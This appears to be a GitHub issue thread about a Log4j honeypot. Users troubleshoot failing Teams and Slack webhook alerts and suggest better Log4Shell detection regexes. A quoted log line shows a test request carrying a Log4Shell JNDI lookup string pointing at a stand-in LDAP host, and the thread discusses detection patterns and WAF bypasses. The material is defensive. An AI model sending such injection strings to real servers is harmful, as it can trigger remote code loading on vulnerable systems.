How much testing did you do with Teams webhooks? I wasn't able to run the honeypot in Docker with the Teams string and even setting the environmental variables and just running the app it doesn't seem to work. My skill level with Docker and Linux in general is novice. If this is the wrong place for this I apologize in advance.

Hello, im novice when it comes to python and requests. But straight of the bat its not working with a webhook to post anything to teams. I tried slack as well but to no success - booted up a kali, a ubuntu and another linux machine, its same on all of them (no post being made). So i tried a regular Windows machine with a ps1 json post and it went straight into the teams channel -so the hook works. The "listener" is running and i can see my request coming in on the "server" (app.py, in the terminal - and its formatted as json).

I cant tell whats wrong, but its not working. 3 different systems, different hooks (slack, teams and webhook.site). Tried adding print('debug x') here and there and everything seems to work - except the post to be made to to teams.

Maybe its just me.

Im starting the server with commandlines, but i also tried hardcoded variables in the app.py.

  Running on all addresses.
   WARNING: This is a development server. Do not use it in a production deployment.
  Running on http://x.x.x.x:4444/ (Press CTRL+C to quit)   #<---- here a curl request is made, it comes through:
('Host', 'x.x.x.x:4444')
('User-Agent', 'curl/7.79.1')
('Accept', '*/*')
('X-Api-Version', '${jndi:ldap://ooof.muchlog4j}')
x.x.x.x - - [15/Dec/2021 13:28:37] "GET / HTTP/1.1" 200 -

Just wanted to add that a regular python json post works to the same webhook:

import requests
import json

url = "xxxxxxxxx"

payload = {
    "text": "Sample alert text"
}
headers = {
    'Content-Type': 'application/json'
}
response = requests.post(url, headers=headers, data=json.dumps(payload))
print(response.text.encode('utf8'))

Buildah isn't guaranteed to pull from docker.io. It always recommended to use the full name.

In this case it seems to work out fine. I have had issues in the past with this however.

This log4j honeypot is a great idea! However, I have a suggestion. Detecting only on the string ${ might prove to elicit many false positives. While using some of the common YARA strings being published are proving vulnerable to WAF bypasses, and elicit many false negatives. Karan Lyons has published log4shell regexes that appear to mitigate this. https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6